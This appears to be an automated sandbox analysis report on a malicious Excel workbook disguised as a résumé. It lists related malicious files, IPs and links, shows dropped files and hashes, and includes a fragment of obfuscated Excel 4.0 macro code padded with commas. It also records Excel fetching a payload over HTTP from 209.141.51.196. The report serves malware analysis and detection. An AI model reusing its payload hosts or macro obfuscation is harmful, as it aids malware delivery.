                                                                                                                                                  r9hCsYN33e.exeGet hashmaliciousBrowse
                                                                                                                                                  • 205.185.119.34
                                                                                                                                                  Payment 901.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.195.253.181
                                                                                                                                                  https://bit.ly/3aSYufoGet hashmaliciousBrowse
                                                                                                                                                  • 198.98.56.76
                                                                                                                                                  https://bit.ly/3nZNIaFGet hashmaliciousBrowse
                                                                                                                                                  • 198.98.56.76
                                                                                                                                                  https://bit.ly/3romooFGet hashmaliciousBrowse
                                                                                                                                                  • 198.98.56.76
                                                                                                                                                  utox.exeGet hashmaliciousBrowse
                                                                                                                                                  • 205.185.116.116
                                                                                                                                                  http://avaxhome5lcpcok5.onion.lyGet hashmaliciousBrowse
                                                                                                                                                  • 198.251.89.118
                                                                                                                                                  MH1809380042BB.docGet hashmaliciousBrowse
                                                                                                                                                  • 107.189.3.209
                                                                                                                                                  http://205.185.113.20/C4wZRLGet hashmaliciousBrowse
                                                                                                                                                  • 205.185.113.20
                                                                                                                                                  vbc.exeGet hashmaliciousBrowse
                                                                                                                                                  • 198.251.81.30
                                                                                                                                                  LISTE DES TRANSACTIONS PAS CARTES.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 107.189.2.112
                                                                                                                                                  zISJXAAewo.exeGet hashmaliciousBrowse
                                                                                                                                                  • 107.189.2.52
                                                                                                                                                  uqAU5Vneod.exeGet hashmaliciousBrowse
                                                                                                                                                  • 107.189.2.52
                                                                                                                                                  tDuLlLosre.exeGet hashmaliciousBrowse
                                                                                                                                                  • 107.189.2.52
                                                                                                                                                  JCoQLSCskq.exeGet hashmaliciousBrowse
                                                                                                                                                  • 198.98.57.15

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\77C43E78-5473-430D-A2CF-3011B6265ED8
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):132942
                                                                                                                                                  Entropy (8bit):5.372923032705822
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:2cQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:4rQ9DQW+zBX8P
                                                                                                                                                  MD5:49C344DDB2A56A073DE9D993EB7034D5
                                                                                                                                                  SHA1:BB61AA2A495D17AAE065A26C885932B74000FFB5
                                                                                                                                                  SHA-256:4822F38317D53603AC53AF95FFDA9EDC743293FA3D70FEEAFDAB2FF5D7E1D1FB
                                                                                                                                                  SHA-512:851F088B10272B73B4237A9E51C92FB5B8F29F44C576DF189D70956C819348E2B2B2E97DECDD14A83F8343B0BFA254C37BA40A7C657D87BD5C61ACB9F01AF4D0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-20T18:13:39">.. Build: 16.0.13718.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8AFFEE0A.jpeg
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1011x567, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):55961
                                                                                                                                                  Entropy (8bit):7.8745563773940725
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:QUQt43PNewplZDlm1ajiDPnp3AvLJ03ntpE3g+O0t2DoV:UwbZRQJAd0MrO0UEV
                                                                                                                                                  MD5:102DCD780DA80675F5038CFB42D936CE
                                                                                                                                                  SHA1:417033D6C45E4209909A2EF7B5436673A74FB164
                                                                                                                                                  SHA-256:88F6B392616EA29C03682E3EC079F58C5E8BDC18C7CCB09BA6D5DC0BEDC13EA8
                                                                                                                                                  SHA-512:6478CD1B6F256ABA81374018B751D4ABE03B99B6A1CCB528D97E2ADA7558373161F002CA7D8D6088E897390F9A0F2CE3E925C604B3F855C1EBAA04E53F01ECEF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: ......JFIF.....`.`.....C....................................................................C.......................................................................7...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..~.L.Q._>~.*...M..@.L.2(..RdR..(.2*.....v...F.~=h.z.qv........I.FE.-...dP..I.FE.-...dP..I.FE.-...dP..I.FE.-...dP..I.FE.-..h...L.2(.h..ZL..Z(...)2(.....Va@.E&E....RdR.....L.~F(.v.{R'SH...b.6......"...-...dP..I.FE.-...dP..I.F.@.E(.8...L.2(.h..".....P.E......2(..QI.2(.h.."...L.2(.h.."...L.2(.h.."...L.2(.h.."...L.2(.h.....8.....L..Z)2(...."...Z)2(...."...Z
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\20B40000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):214824
                                                                                                                                                  Entropy (8bit):7.9598111087102374
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:h5I2ZOJAd0MrO0UEYsqXG1K4u0hjNp6GaDrw3xu:DAJAdFrOpEYsiGkKjjpEr
                                                                                                                                                  MD5:0D19C0A4E20BAC8A2DB941B82E953D65
                                                                                                                                                  SHA1:D967AEA934947F972A2EFDB42597EB600403DF74
                                                                                                                                                  SHA-256:5DF21B6C179C4797002394D8964C9CC9EFE107E523ECA0259B49E6BC782C939B
                                                                                                                                                  SHA-512:C64A84010FEC3A55B6678072555BC38F4E8800C338B190531661AE37ED0CE0570B3666FAACF6526857AF2B11A7794B736FC3F5334903CD01ACDD59EF5E3861DB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ..N.1.....+.].Z(T.p....}...dM|..@......J."..=....x-...fFW..H9..f.*..Ie'-.}..>a.E.....9.;.}..^.=R..-......D...q.m...` ..0....&....c...hc.........t..g.....U....W...e......E.x.......V. ..TM.,s.S...:[.G.C=5X.]...Jbu.!.....L....7.M.."..P.3....16.Dp..n4.1P....Ne~.%^n..x...b........x..J'.L..... ....J.G..Wd....{..'.G=.8....p....?q.T....k...GG..r`Q.k.w.v!.....*.T.........!#.....})..7....<..#....+...'!.Q.[XW.W..Kx.....I.k.yi.F........PK..........!..2..............[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22
                                                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                  C:\Users\user\Desktop\~$myResume_787.xlsb
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):165
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                  MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                  SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                  SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                  SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.956967333067683
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                  • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                  File name:myResume_787.xlsb
                                                                                                                                                  File size:237346
                                                                                                                                                  MD5:89394df2bb1ba2e4b62d510b8bcb97fb
                                                                                                                                                  SHA1:78147f2bcc5f4aeebae3c2cf333f4821a3d5c84f
                                                                                                                                                  SHA256:09e73c5d8c0236688d9c690189601400b7c720f99aa05b1090c93608bdb96d01
                                                                                                                                                  SHA512:457ce008c726282290318b8037e30b884236ff72cfebd08fa8413c6f9887e9202de3c4ead02dbd5c5446bcda834eb1b51289120e9d8336ddb15cf361edc5b3b0
                                                                                                                                                  SSDEEP:6144:yGqra5ujbf9SeP2ZOJAd0MrO0UEPCSY/N30Wq:V5ufcBAJAdFrOpEqz30Wq
                                                                                                                                                  File Content Preview:PK..........!...L.....#.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "myResume_787.xlsb"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,=ASSIGN.TO.OBJECT(PfildDRKuceybgtqZmMMnvJkFjIZzal),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CLOSE.ALL(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ALERT(FjhPEYOFTdMMyzajvXrWuNYN),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CANCEL.KEY(TRUE),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=BRING.TO.FRONT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CLOSE.ALL(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=BRING.TO.FRONT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ASSIGN.TO.OBJECT(NsQiI),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 20, 2021 19:13:42.389256954 CET4974180192.168.2.4209.141.51.196
                                                                                                                                                  Jan 20, 2021 19:13:42.588630915 CET8049741209.141.51.196192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:42.588795900 CET4974180192.168.2.4209.141.51.196
                                                                                                                                                  Jan 20, 2021 19:13:42.589246988 CET4974180192.168.2.4209.141.51.196
                                                                                                                                                  Jan 20, 2021 19:13:42.788156986 CET8049741209.141.51.196192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:42.811311007 CET8049741209.141.51.196192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:42.811491013 CET4974180192.168.2.4209.141.51.196
                                                                                                                                                  Jan 20, 2021 19:14:47.823390961 CET8049741209.141.51.196192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:47.823595047 CET4974180192.168.2.4209.141.51.196
                                                                                                                                                  Jan 20, 2021 19:15:29.045985937 CET4974180192.168.2.4209.141.51.196
                                                                                                                                                  Jan 20, 2021 19:15:29.245212078 CET8049741209.141.51.196192.168.2.4

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 20, 2021 19:13:26.988920927 CET4925753192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:27.040029049 CET53492578.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:27.932039976 CET6238953192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:27.982959032 CET53623898.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:28.876959085 CET4991053192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:28.925070047 CET53499108.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:29.795716047 CET5585453192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:29.843913078 CET53558548.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:30.851855993 CET6454953192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:30.899816990 CET53645498.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:32.149019957 CET6315353192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:32.197221041 CET53631538.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:36.125978947 CET5299153192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:36.173906088 CET53529918.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:38.046649933 CET5370053192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:38.094772100 CET53537008.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:39.068912029 CET5172653192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:39.127012968 CET53517268.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:39.575742006 CET5679453192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:39.632322073 CET53567948.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:40.585644960 CET5679453192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:40.642421007 CET53567948.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:41.589840889 CET5679453192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:41.646461010 CET53567948.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:42.118364096 CET5653453192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:42.175108910 CET53565348.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:43.106162071 CET5662753192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:43.157186031 CET53566278.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:43.603379965 CET5679453192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:43.660763979 CET53567948.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:44.141845942 CET5662153192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:44.201088905 CET53566218.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:45.111267090 CET6311653192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:45.159754992 CET53631168.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:46.560995102 CET6407853192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:46.611943007 CET53640788.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:47.614927053 CET5679453192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:47.671833992 CET53567948.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:52.513715029 CET6480153192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:52.561850071 CET53648018.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:13:56.588123083 CET6172153192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:13:56.645776987 CET53617218.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:08.394100904 CET5125553192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:08.457283020 CET53512558.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:09.048290968 CET6152253192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:09.113248110 CET53615228.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:09.799602985 CET5233753192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:09.856142044 CET53523378.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:10.272778034 CET5504653192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:10.329411983 CET53550468.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:10.409471989 CET4961253192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:10.475780964 CET53496128.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:10.760950089 CET4928553192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:10.822180986 CET53492858.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:11.349204063 CET5060153192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:11.408370972 CET53506018.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:12.067596912 CET6087553192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:12.127182961 CET53608758.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:12.904978037 CET5644853192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:12.961225986 CET53564488.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:13.852346897 CET5917253192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:13.911751032 CET53591728.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:14.410186052 CET6242053192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:14.466749907 CET53624208.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:16.865715981 CET6057953192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:16.922097921 CET53605798.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:27.618455887 CET5018353192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:27.666399956 CET53501838.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:27.717717886 CET6153153192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:27.792284966 CET53615318.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:14:30.834867954 CET4922853192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:14:30.895483017 CET53492288.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:15:01.420727015 CET5979453192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:15:01.468831062 CET53597948.8.8.8192.168.2.4
                                                                                                                                                  Jan 20, 2021 19:15:03.149983883 CET5591653192.168.2.48.8.8.8
                                                                                                                                                  Jan 20, 2021 19:15:03.206461906 CET53559168.8.8.8192.168.2.4

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 209.141.51.196

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.449741209.141.51.19680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jan 20, 2021 19:13:42.589246988 CET236OUTGET /Lk9tdZ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
